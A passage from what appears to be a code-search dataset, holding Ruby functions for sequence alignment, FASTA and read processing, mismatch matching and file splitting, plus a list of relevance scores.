TRUE\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found anchor pairs.\"\t\t\n\t\tinput_hash\n\tend",
"def gen_random_seqs(msa_file,noalign_random_file)\n\n #read simple fasta file\n puts `pwd`\n\n\n len_align = 0;\n\n #create new OriginalAlignment\n oa = Bio::Alignment::OriginalAlignment.new()\n #load sequences from file\n Bio::FlatFile.open(Bio::FastaFormat, msa_file) { |ff|\n #store sequence from file\n ff.each_entry { |x| oa.add_seq(x.seq,x.entry_id) }\n }\n\n #remove gaps\n oa.remove_all_gaps!\n #determine ungaped length\n #oa.each_seq { |seq| len_align=[len_align,seq.length].max }\n #show it\n len_align = oa.alignment_length\n\n #store random sequence\n oa = oa.alignment_collect {|key| key = gen_rand_dna_seq(len_align) }\n\n #puts oa.output(:fasta)\n\n #puts result on disk\n simple_seqs_file = File.new(noalign_random_file,\"w\")\n simple_seqs_file.puts(oa.output_fasta)\n simple_seqs_file.close;\n \n end",
"def initialize(names, force_overwrite, ref, software,\n annotation, tophat_aligner, mismatches, err_rate)\n super(names, force_overwrite, ref, software)\n @annotation = annotation\n @tophat_aligner = tophat_aligner\n @mismatches = mismatches\n @err_rate = err_rate\n @mapped_bams = []\n @unmapped_bams = []\n @max_mismatches = 0\n end",
"def quasi_match?(text_base, max_mismatches)\n return true if max_mismatches >= patt_len\n\n # offset affects both the text and pattern.\n # Match checks are done by comparing\n # text[text_base+offset..text_base+len-1]\n # against\n # patt[offset..len-1]\n offset = 0\n\n # up to and including max_mismatches can be found\n (max_mismatches+1).times do\n mismatch_idx = next_mismatch(text_base, offset)\n return true unless mismatch_idx\n\n # If the mismatch was found at some index, further checks\n # need to happen from that index onward (not including the mismatch index)\n offset = mismatch_idx+1\n end\n\n false\n end",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def gags(options={})\n min_disagreeing_proportion = options[:min_disagreeing_proportion]\n min_disagreeing_proportion ||= 0.1\n min_disagreeing_absolute = options[:min_disagreeing_absolute]\n min_disagreeing_absolute ||= 3\n \n options[:acceptable_gag_errors] ||= DEFAULT_GAG_ERROR_CONTEXTS\n \n log = Bio::Log::LoggerPlus['bio-gag']\n \n piles = []\n gags = []\n \n each do |pile|\n options[:progressbar].inc unless options[:progressbar].nil?\n \n if piles.length < 2\n #log.debug \"Piles cache for this reference sequence less than length 2\"\n piles = [piles, pile].flatten\n next\n elsif piles.length < 3\n #log.debug \"Piles cache for this reference sequence becoming full\"\n piles = [piles, pile].flatten\n elsif piles[1].ref_name != pile.ref_name\n #log.debug \"Piles cache removed - moving to new contig\"\n piles = [pile]\n next\n else\n #log.debug \"Piles cache regular push through\"\n piles = [piles[1], piles[2], pile].flatten\n end\n log.debug \"Current piles now at #{piles[0].ref_name}, #{piles.collect{|pile| \"#{pile.pos}/#{pile.ref_base}\"}.join(', ')}\" if log.debug?\n \n # if not at the start/end of the contig\n first = piles[0]\n second = piles[1]\n third = piles[2]\n \n # Require particular sequences in the reference sequence\n ref_bases = \"#{first.ref_base.upcase}#{second.ref_base.upcase}#{third.ref_base.upcase}\"\n index = options[:acceptable_gag_errors].index(ref_bases)\n if index.nil?\n log.debug \"Sequence #{ref_bases} does not match whitelist, so not calling a gag\" if log.debug?\n next\n end\n gag_sequence = options[:acceptable_gag_errors][index]\n \n # all reads that have a single insertion after the first or second position, but not both \n inserting_reads = [first.reads, second.reads].flatten.uniq.select do |read|\n !(read.insertions[first.pos] and read.insertions[second.pos]) and\n (read.insertions[first.pos] or read.insertions[second.pos])\n end\n log.debug \"Inserting reads after filtering: #{inserting_reads.inspect}\" if log.debug?\n \n # ignore regions that aren't ever going to make it past the next filter\n if inserting_reads.length < min_disagreeing_absolute or inserting_reads.length.to_f/first.coverage < min_disagreeing_proportion\n log.debug \"Insufficient disagreement at step 1, so not calling a gag\" if log.debug?\n next\n end\n\n # what is the maximal base that is inserted and maximal number of directions\n direction_counts = {'+' => 0, '-' => 0}\n base_counts = {}\n inserting_reads.each do |read|\n insert = read.insertions[first.pos]\n insert ||= read.insertions[second.pos]\n insert.upcase!\n direction_counts[read.direction] += 1\n base_counts[insert] ||= 0\n base_counts[insert] += 1\n end\n log.debug \"Direction counts of insertions: #{direction_counts.inspect}\" if log.debug?\n log.debug \"Base counts of insertions: #{base_counts.inspect}\" if log.debug?\n max_direction = direction_counts['+']>direction_counts['-'] ? 
'+' : '-'\n max_base = base_counts.max do |a,b|\n a[1] <=> b[1]\n end[0]\n log.debug \"Picking max direction #{max_direction} and max base #{max_base}\" if log.debug?\n \n # Only accept positions that are inserting a single base\n if max_base.length > 1\n log.debug \"Maximal insertion is too long, so not calling a gag\" if log.debug?\n next\n end\n \n counted_inserts = inserting_reads.select do |read|\n insert = read.insertions[first.pos]\n insert ||= read.insertions[second.pos]\n insert.upcase!\n if read.direction == max_direction and insert == max_base\n # Remove reads that don't match the first and third bases like the consensus sequence\n read.sequence[read.sequence.length-1] == third.ref_base and\n read.sequence[read.sequence.length-3] == first.ref_base\n else\n false\n end\n end\n log.debug \"Reads counting after final filtering: #{counted_inserts.inspect}\" if log.debug?\n \n coverage = (first.coverage+second.coverage+third.coverage).to_f / 3.0\n coverage_percent = counted_inserts.length.to_f / coverage\n log.debug \"Final abundance calculations: max base #{max_base} (comparison base #{second.ref_base.upcase}) occurs #{counted_inserts.length} times compared to coverage #{coverage} (#{coverage_percent*10}%)\" if log.debug?\n if max_base != second.ref_base.upcase or # first and second bases must be the same \n counted_inserts.length < min_disagreeing_absolute or # require 3 bases in that maximal direction\n coverage_percent < min_disagreeing_proportion # at least 10% of reads with disagree with the consensus and agree with the gag\n log.debug \"Failed final abundance cutoffs, so not calling a gag\" if log.debug?\n next\n end\n \n # alright, gamut navigated. We have a match, record it\n gag = Bio::Gag.new(second.pos, piles, first.ref_name)\n gags.push gag\n log.debug \"Yielding gag #{gag.inspect}\"\n yield gag if block_given?\n end\n \n return gags\n end",
"def warp_aligned\n \n align = params[:align]\n append = params[:append]\n destmap = Map.find(params[:destmap])\n\n if destmap.status.nil? or destmap.status == :unloaded or destmap.status == :loading\n flash.now[:notice] = t('.no_destination')\n redirect_to :action => \"show\", :id=> params[:destmap]\n elsif align != \"other\"\n\n if params[:align_type] == \"original\"\n destmap.align_with_original(params[:srcmap], align, append )\n else\n destmap.align_with_warped(params[:srcmap], align, append )\n end\n flash.now[:notice] = t('.success')\n redirect_to :action => \"warp\", :id => destmap.id\n else\n flash.now[:notice] = t('.unknown_alignment')\n redirect_to :action => \"align\", :id=> params[:srcmap]\n end\n end",
"def test_project_from_assembly_to_two_components\n # This chromosomal region is covered by contigs AAFC03028970, a gap and AAFC03028962\n # * Position 175000 on chr 20 is position 4030 on contig AAFC03028970\n # * Position 190000 on chr 20 is position 35 on contig AAFC03028962\n assert_equal(3, @target_slices_two_contigs.length)\n assert_equal('contig:Btau_4.0:AAFC03028970:4030:17365:1', @target_slices_two_contigs[0].display_name)\n assert_equal(Gap, @target_slices_two_contigs[1].class)\n assert_equal('contig:Btau_4.0:AAFC03028962:1:35:1', @target_slices_two_contigs[2].display_name)\n end",
"def test_compare_many\n result = @comparer.compare @first_doc, @second_doc\n\n #assert_equal result >= 0, true\n #assert_equal result <= 1, true\n\n results = Array.new(@documents.length) { Array.new(@documents.length, 0) }\n\n @dest = SheetDestination.new $test_results_dir + \"/loaded(#{@doc_count})_compare-documents(#{@compare_count}).ods\"\n\n @documents.length.times { |i|\n @documents.length.times { |j|\n puts \"comapre #{i} with #{j}\" if j % 10 == 0\n\n results[i][j] = @comparer.compare @documents[i], @documents[j]\n\n @dest.write results[i][j], i, j\n\n break if j + 1 >= @compare_count\n }\n\n break if i + 1 >= @compare_count\n }\n\n @dest.save\n dest = SheetDestination.new $test_results_dir + '/tdm.ods'\n dest.write_tdm @documents\n\n end",
"def mafft_consensus(reads, percentID)\n tmp = Tempfile.new(\"maffttmp\", @temp_path)\n reads.each.with_index(1) do |read_inf, index|\n tmp.puts \">#{read_inf.type}_#{read_inf.start_pos}_#{read_inf.end_pos}-v#{index}\"\n tmp.puts read_inf.seq.upcase\n end\n tmp.flush\n\n env = {}\n if @temp_path && !@temp_path.empty?\n env['TMPDIR'] = @temp_path\n end\n cmd = [@mafft, '--nuc', '--ep', '0.0', '--op', '1', '--genafpair', '--maxiterate', '1000', tmp.path]\n res, err, status = Open3.capture3(env, *cmd)\n unless status.success?\n STDERR.puts(\"mafft stderr:\")\n STDERR.puts(err)\n report_error(status, cmd.join(' '), [tmp]) if status.success?\n end\n tmp.close(true)\n\n # makeing a consensus seq\n align_reads = {}\n res.split(\"\\n>\").each do |align_read|\n align_read_ary = align_read.split(\"\\n\")\n if align_read_ary.last == \">\"\n if align_read_ary[0].start_with?('>')\n read_name = align_read_ary[0][1..-1]\n else\n read_name = align_read_ary[0]\n end\n align_reads[read_name] = align_read_ary[1..-2].join(\"\")\n else\n read_name = align_read_ary[0]\n align_reads[read_name] = align_read_ary[1..-1].join(\"\")\n end\n end\n\n aln = Bio::Alignment.new(align_reads.values.sort)\n align_reads_names = []\n consensus = aln.consensus_string(percentID, gap_mode: -1) # threshold =%id\n\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtggAGGtcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n check = Hash.new(0) # depth1の場所を探し、trimする\n align_reads.each do |read_name, align_seq|\n read_name = read_name[1..-1] if read_name.start_with?(\">\")\n align_seq.each_char.with_index{ |allele, num| check[num] += 1 if allele != \"-\" }\n align_reads_names << [align_seq, read_name]\n end\n max_num = check.keys.max\n\n new_cons = []\n if align_reads_names.size > 2 # multiple-alignmentの場合\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # ---tcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # 最初の数文字と最後の数文字はdepth1でも消さない\n # >最初\n bef_index = -1\n flg = 0\n check.sort_by { |k, v| k }.each do |index, cnt|\n if flg == 0 and cnt == 1\n bef_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n # >最後\n aft_index = max_num + 1\n flg = 0\n check.sort_by{|k,v|k}.reverse.each do |index, cnt|\n if flg == 0 and cnt == 1\n aft_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n\n # align_reads_namesのチェック\n align_reads_names.each do |align_seq, read_name|\n new_align_seq = \"\"\n align_seq.each_char.with_index do |seq, num|\n if num <= bef_index || aft_index <= num # 最初と最後のdepth1\n new_align_seq += seq\n elsif check[num] != 1\n new_align_seq += seq\n end\n end\n end\n consensus.each_char.with_index do |seq, num|\n if num <= bef_index or aft_index <= num # 最初と最後のdepth1\n new_cons << seq\n elsif check[num] != 1\n new_cons << seq\n end\n end\n\n # pairwise-alignmentのときは特になにもせずO.K.\n else\n new_cons = [consensus]\n end\n new_cons = new_cons.join(\"\")\n\n return new_cons, reads.size\n end",
"def match_words_yandex\n eng_size= @eng_sentence.length - 1\n collision= false\n updated= false\n\n (0..eng_size).each { |eng_index|\n if !@used_eng[eng_index]\n eng_word= @eng_sentence[eng_index]\n translations= @all_translations[eng_word]\n rus_indexes= []\n translations.each do |translation|\n rus_indexes+= matches_infinitives(translation)\n end\n rus_indexes.uniq!\n if rus_indexes.size == 1\n updated= true\n @used_eng[eng_index]= true\n @used_rus[rus_indexes[0].rus_index]= true\n @translation_eng_to_rus[eng_index]= rus_indexes[0].translation\n else\n collision|= rus_indexes.size > 1\n end\n end\n }\n\n if collision && updated\n match_words_yandex\n end\n end",
"def update_alignment\n\n inital_params = {is_valid:0, step: step, km: km, kcal: kcal}\n new_align = segments.create_with(inital_params).find_or_create_by(is_valid: 0)\n\n total_valid = segments.select(\"sum(step) as step, sum(km) as km, sum(kcal) as kcal\").where(\"is_valid = 1\").first\n\n unless total_valid.step.nil?\n new_align.step = step - total_valid.step\n new_align.km = km - total_valid.km\n new_align.kcal = kcal - total_valid.kcal\n end\n\n new_align.save!(:validate => false)\n end",
"def diff(a_in, b_in)\r\n result = a_in.diff(b_in)\r\n \r\n p [a_in, b_in]\r\n \r\n # create an array of pairs of matches: [ [a,b], [a,b], ... ]\r\n sames = result[:matched_old].zip(result[:matched_new]).sort_by{|a,b| p [a,b] ; a.first }\r\n \r\n # create a null range as an endpoint\r\n sames = [ [-1...0, -1...0] ] + sames\r\n \r\n last_a, last_b = sames.last\r\n add_to_a = last_a.last < (a_in.size) ? (a_in.size...a_in.size) : nil\r\n add_to_b = last_b.last < (b_in.size) ? (b_in.size...b_in.size) : nil\r\n \r\n if add_to_a or add_to_b\r\n sames << [add_to_a, add_to_b]\r\n end\r\n \r\n a_stream = []\r\n b_stream = []\r\n \r\n puts \"sames: #{sames.inspect}\"\r\n \r\n sames.each_cons(2) do |pair_1, pair_2|\r\n a1, b1 = pair_1\r\n a2, b2 = pair_2\r\n \r\n a_gap = gap(a1, a2)\r\n b_gap = gap(b1, b2)\r\n\r\n p [:pair_1, pair_1]\r\n p [:pair_2, pair_2]\r\n p [:a_gap, a_gap]\r\n p [:b_gap, b_gap]\r\n \r\n if a_gap and !b_gap\r\n # deletion from A\r\n a_stream << [a_gap, :deleted]\r\n elsif b_gap and !a_gap\r\n # addition to B\r\n b_stream << [b_gap, :added]\r\n elsif a_gap and b_gap\r\n # change from A to B\r\n a_stream << [a_gap, :changed]\r\n b_stream << [b_gap, :changed]\r\n else\r\n # no gap!\r\n p [:no_gap]\r\n end\r\n \r\n a_stream << [a2, :same] if a_gap and a_in[a2] != \"\"\r\n b_stream << [b2, :same] if b_gap and b_in[b2] != \"\"\r\n end\r\n \r\n [a_stream, b_stream] \r\nend",
"def next_mismatch(text_base, offset)\n l = 0\n r = patt_len-offset\n\n mismatch_offset = nil\n\n while l < r\n len = (l+r)/2\n\n if match_patt?(text_base, offset, len)\n l = len+1\n else\n mismatch_offset = offset+len-1\n r = len\n end\n end\n \n if l==r && r!=len && !match_patt?(text_base, offset, r)\n mismatch_offset = offset+r-1\n end\n\n mismatch_offset\n end",
"def semi_match(guess)\n\t\t\t# removes exact matches from guess \n\t\t\tunmatched = @indices.map {|i| guess[i]}\n\t\t\t# looks at available indices in @code and removes first instance\n\t\t\t# of a number in unmatched for each match made\n\t\t\t@indices.each {\n\t\t\t\t|i| unmatched.slice!(unmatched.index(@code[i])) if unmatched.include?(@code[i]) \n\t\t\t}\n\t\t\t# returns number of correct numbers in the incorrect place\n\t\t\t@indices.length - unmatched.length\n\t\tend",
"def msa_replace_random(dir,msa_orig_file,seqs_rand_file,msa_rand_file)\n\n\n rs=PValues::RandomSequences.new\n\n\n #all files in same directory\n msa_orig = dir + msa_orig_file\n seqs_rand = dir + seqs_rand_file\n msa_rand = dir + msa_rand_file\n\n\n rs.gen_random_seqs(msa_orig,seqs_rand)\n\n parser = UqamDoc::Parsers.new\n seqs = parser.fastafile_to_fastastring(seqs_rand)\n\n #align\n maf = UqamDoc::Mafft.new #cw2=UqamDoc::ClustalW2.new\n job_id = maf.submit_dna(seqs) #job_id= cw2.submit_dna(seqs)\n #recuperate\n fasta_str = maf.get_msa_wait(job_id) #fasta_str = cw2.get_msa_wait(job_id)\n #puts fasta_str\n\n\n parser.string_to_file(fasta_str,msa_rand)\n\n\n\n\n\n\n end",
"def collaps_qnames(input_file, output_file)\n\t\n\t\tloci = {}\n\t\n\t\t# Read candidate loci and count reads/locus\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")\n\t\t\tqname = line[0]\n\t\t\tbase = qname.gsub(/\\/[1,2]/, '')\n\t\t\tpos_a = line[1..3].join(':')\n\t\t\tpos_b = line[4..6].join(':')\n\t\t\tpos = [pos_a, pos_b].join(':')\n\n\t\t\talignment_length = line[-1]\n\t\n\t\t\tif !loci.has_key?(pos)\n\t\t\t\tloci[pos] = {:count => 1, :qnames => [qname], :l => alignment_length}\n\t\t\telse \n\t\t\t\tloci[pos][:qnames] << qname\n\t\t\t\tloci[pos][:count] += 1\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\tloci.each do |pos, v| \n\t\t\t\toutput.puts [pos.split(':'), v[:count], v[:l], v[:qnames].join(';')].join(\"\\t\") if v[:count] > 0\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Collapsed anchor pairs to single loci.\"\n\tend"
] |
[
"0.62253803",
"0.58747196",
"0.5843623",
"0.5830741",
"0.5824848",
"0.5820188",
"0.58144766",
"0.5750869",
"0.5593341",
"0.55397415",
"0.5529191",
"0.54764867",
"0.54322106",
"0.5425921",
"0.54136413",
"0.5409192",
"0.5378132",
"0.53759843",
"0.53000605",
"0.5279042",
"0.5265202",
"0.5263142",
"0.5231639",
"0.52286226",
"0.5222191",
"0.520577",
"0.520379",
"0.51791376",
"0.5130634",
"0.5127823",
"0.5111462",
"0.5108104",
"0.5101365",
"0.5076029",
"0.5072557",
"0.50664544",
"0.5061593",
"0.5022581",
"0.50208837",
"0.501881",
"0.50178045",
"0.5002755",
"0.49957466",
"0.4994219",
"0.49834588",
"0.49617678",
"0.49563476",
"0.49442914",
"0.4932834",
"0.4924094",
"0.4919367",
"0.49100086",
"0.49006444",
"0.48953348",
"0.48950243",
"0.48779657",
"0.48248556",
"0.48225984",
"0.48120168",
"0.48111972",
"0.48084536",
"0.48079655",
"0.47946024",
"0.4785111",
"0.47850418",
"0.4783045",
"0.47782055",
"0.47552153",
"0.47496817",
"0.47454745",
"0.47415474",
"0.47381482",
"0.4727058",
"0.47211033",
"0.47109205",
"0.47107443",
"0.47027048",
"0.46921784",
"0.46743605",
"0.4669127",
"0.46685708",
"0.46675208",
"0.46671003",
"0.46565282",
"0.46318743",
"0.46301922",
"0.4626432",
"0.4626432",
"0.46210045",
"0.46193352",
"0.46129966",
"0.4612383",
"0.4612111",
"0.4608241",
"0.4608055",
"0.46079427",
"0.4606554",
"0.46035552",
"0.46018752",
"0.46016577"
] |
0.61717033
|
1
|
Splits reads into several files, each containing a read length range, to allow for separate alignments with a relative number of errors. error rate = num of errors / read length. Returns array.
|
def bucketize(error_rate)
buckets = []
run_cmd(
"fastq-bucketize #{@names.get('fp')} #{error_rate} " \
"2> #{@names.get('buckets')}"
)
# parse buckets and compute corresponding absolute number of errors
File.readlines(@names.get('buckets')).each do |line|
        next if line[0] == '#' # skip comment lines
        line = line.split.map(&:to_i)
        # sanity check: every length inside one bucket must map to the
        # same absolute number of errors
        fail 'bucket spans differing error counts' if (line[0] * error_rate).floor != (line[1] * error_rate).floor
        # skip buckets entirely below the minimum read length
        next if line[1] < 14 # TODO: implement minlen option
        # push [lower bound, upper bound, absolute #errors]
        buckets.push([line[0], line[1], (line[0] * error_rate).floor])
end
buckets
end
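
For intuition, here is a minimal standalone sketch (not part of the original source; `fastq-bucketize` and `@names` are external assumptions left out) of the invariant the `fail` guard enforces: every read length within one bucket must floor to the same absolute error count, so a bucket boundary falls exactly where floor(length * error_rate) changes.

  # Hypothetical illustration: with error_rate = 0.1, reads of length
  # 20..29 all allow floor(len * 0.1) = 2 errors and share a bucket;
  # length 30 allows 3 errors and must start a new bucket.
  error_rate = 0.1
  (14..35).group_by { |len| (len * error_rate).floor }.each do |errs, lens|
    puts "lengths #{lens.first}-#{lens.last} -> #{errs} absolute errors"
  end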
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def array_by_40_characters \n recieve_and_read_file.scan(/.{1,40}/)\n end",
"def sub_chunks(data_offset: 0, sub_chunk_size_length: @size_length, sub_chunk_header_size: @header_size, sub_chunks_format: @chunks_format, warnings: @warnings, debug: @debug, &callback)\n data_size = self.size\n data_size > 0 ? Riffola.read(@file_name,\n offset: @offset + 4 + @size_length + @header_size + data_offset,\n chunks_format: sub_chunks_format,\n max_size: data_size - data_offset,\n parent_chunk: self,\n warnings: @warnings,\n debug: @debug,\n &callback\n ) : []\n end",
"def split_input filename, pieces\n input = {}\n name = nil\n seq=\"\"\n sequences=0\n output_files=[]\n if pieces > 1\n File.open(filename).each_line do |line|\n if line =~ /^>(.*)$/\n sequences+=1\n if name\n input[name]=seq\n seq=\"\"\n end\n name = $1\n else\n seq << line.chomp\n end\n end\n input[name]=seq\n # construct list of output file handles\n outputs=[]\n pieces = [pieces, sequences].min\n pieces.times do |n|\n outfile = \"#{filename}_chunk_#{n}.fasta\"\n outfile = File.expand_path(outfile)\n outputs[n] = File.open(\"#{outfile}\", \"w\")\n output_files[n] = \"#{outfile}\"\n end\n # write sequences\n count=0\n input.each_pair do |name, seq|\n outputs[count].write(\">#{name}\\n\")\n outputs[count].write(\"#{seq}\\n\")\n count += 1\n count %= pieces\n end\n outputs.each do |out|\n out.close\n end\n else\n output_files << filename\n end\n output_files\n end",
"def remapped_reads(input_file, output_file, read_length, mm=2)\n\t\tremapped = {}\n\t\t\n\t\t# Filter remapped reads\n\t\tinput_file.each do |line|\n\t\t\tmdz = line.match(/MD:Z:\\S*/).to_s\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\tqname, mate = line[0].split('/')\n\t\t\tpos = line[2].split(':')\n\t\t\tcigar = line[5]\n\t\n\t\t\tif !remapped.has_key?(qname) && Alignment.max_mismatches?(mdz, mm) && cigar == \"#{read_length}M\"\n\t\t\t\tremapped[qname] = [pos, mate]\n\t\t\telse\t\n\t\t\t\tremapped.delete(qname)\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\tremapped.each {|k, v| output.puts [\"#{k}/#{v[-1]}\", v[0]].join(\"\\t\")}\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found remapped reads.\"\n\tend",
"def split_input filename, pieces\n input = {}\n name = nil\n seq=\"\"\n sequences=0\n File.open(filename).each_line do |line|\n if line =~ /^>(.*)$/\n sequences+=1\n if name\n input[name]=seq\n seq=\"\"\n end\n name = $1\n else\n seq << line.chomp\n end\n end\n input[name]=seq\n # construct list of output file handles\n outputs=[]\n output_files=[]\n pieces = [pieces, sequences].min\n pieces.times do |n|\n outfile = File.basename(\"#{filename}_chunk_#{n}.fasta\")\n outfile = \"#{@working_dir}/#{outfile}\"\n outputs[n] = File.open(\"#{outfile}\", \"w\")\n output_files[n] = \"#{outfile}\"\n end\n # write sequences\n count=0\n input.each_pair do |name, seq|\n outputs[count].write(\">#{name}\\n\")\n outputs[count].write(\"#{seq}\\n\")\n count += 1\n count %= pieces\n end\n outputs.each do |out|\n out.close\n end\n output_files\n end",
"def reads\n (1..read_count).to_a\n end",
"def process_input_seqs! fnames\n seq_lengths = {}\n clean_fnames = []\n\n fnames.each do |fname|\n clean_fname = fname + \"_aai_clean\"\n clean_fnames << clean_fname\n File.open(clean_fname, \"w\") do |f|\n Object::ParseFasta::SeqFile.open(fname).each_record do |rec|\n unless bad_seq? rec.seq\n header =\n annotate_header clean_header(rec.header),\n File.basename(fname)\n\n seq_lengths[header] = rec.seq.length\n\n f.puts \">#{header}\\n#{rec.seq}\"\n end\n end\n end\n end\n\n [seq_lengths, clean_fnames]\n end",
"def not_test_read_head_part\r\n files_part1 = [\"9-14(15~20略).TXT\", \"33-39(21~32略).TXT\", \"40-43.txt\", \"44-47.txt\", \"48-55.TXT\",\r\n \"56-57概述结束.TXT\", \"58-59.TXT\"]\r\n files_part2 = Array.new\r\n #从60开始,到 471\r\n (60..471).to_a.each{ |i|\r\n files_part2 << i.to_s+\".TXT\"\r\n }\r\n read_from_files(files_part1 + files_part2)\r\n end",
"def read_mrp\n $MRP_FILE = $PRJ_NAME + \"_map.mrp\"\n f = open($MRP_FILE,\"r\")\n while line = f.gets\n if /ERROR/ =~ line\n /LOC=(.*)\\)/ =~ line # pick up Slice name\n $ERROR_SLICE << $1\n end\n end\n f.close\n $ERROR_SLICE.uniq!\nend",
"def read(files); end",
"def read(files); end",
"def split_data_into_files(datafile)\n\n datafiles = []\n output = NIL\n File.open(Rails.root.join(datafile)) do |file| \n counter = 0\n something_was_written = FALSE\n while line = file.gets \n # parse lines and break into different files at #\n if( line.match( /^\\s*\\#+/ ) )\n if (something_was_written && output) \n output.close\n output = NIL\n end\n something_was_written = FALSE\n else \n if (!something_was_written) \n outputfile_name = datafile.gsub(/input/,\"input\" +\n counter.to_s)\n counter +=1\n output = File.open(Rails.root.join(outputfile_name), \"w\") \n datafiles.push((Rails.root.join(outputfile_name)).to_s)\n #datafiles.push( \"../\" + outputfile_name)\n #datafiles.push(Dir.getwd + \"/\" + outputfile_name)\n end\n # check if line matches @n_nodes digits\n nodes_minus_one = (@job.nodes - 1).to_s\n if (line.match( /^\\s*(\\.?\\d+\\.?\\d*\\s+){#{nodes_minus_one}}\\.?\\d+\\.?\\d*\\s*$/ ) ) \n output.puts line\n logger.info \"write line\" + line\n something_was_written = TRUE\n else\n @error_message = \"The data you entered is invalid. This :#{line.chop!}: is not a correct line.\"\n logger.warn \"Error: Input data not correct. This :#{line}: is not a correct line.\"\n return NIL\n end\n end\n end \n file.close\n if (output) \n output.close\n end\n end\n return datafiles\n end",
"def go\n\nlines = 3 # cut it at line 3\n\nbasename = 'file_to_split.txt'\nextname = \"part\"\n\npart = 1\nline = 0\n\nfline = 0\nfor i in ifp = open(basename)\n fline = fline + 1\nend\nifp.close\n\nparts = fline / lines + 1\n\nfor i in ifp = open(basename)\n if line == 0\n ofp = open(sprintf(\"%s.%s%02d\", basename, extname, part), \"w\")\n printf(ofp, \"%s part%02d/%02d\\n\", basename, part, parts)\n ofp.write(\"BEGIN--cut here--cut here\\n\")\n end\n ofp.write(i)\n line = line + 1\n if line >= lines and !ifp.eof?\n ofp.write(\"END--cut here--cut here\\n\")\n ofp.close\n part = part + 1\n line = 0\n end\nend\nofp.write(\"END--cut here--cut here\\n\")\nofp.close\n\nifp.close\n\nend",
"def characters_in_split_arrays\n array_of_lines = recieve_and_read_file.split(\"\\n\")\n row_one = array_of_lines[0].scan(/../).to_a\n row_two = array_of_lines[1].scan(/../).to_a\n row_three = array_of_lines[2].scan(/../).to_a\n row_one.zip(row_two, row_three)\n end",
"def read_out_files(fh,number_files, unpack_35, dup_refs_gt_0)\n out_files = Array.new(number_files)\n header.num_dta_files.times do |i|\n out_files[i] = Mspire::Sequest::Srf::Out.from_io(fh, unpack_35, dup_refs_gt_0)\n end\n out_files\n end",
"def separate_digit_lines(parsed_text_file)\n parsed_text_file.each_slice(4).to_a\nend",
"def get_training_range(total_size, idx)\n num_files = (total_size * TEST_PERCENTAGE) / 100\n if (idx + num_files <= total_size)\n [idx...(idx + num_files)]\n else\n [idx...total_size, 0...num_files - (total_size - idx)]\n end\nend",
"def get_multi_line_input_int_arr(original_filename)\n get_input_str_arr(original_filename).map(&:to_i)\nend",
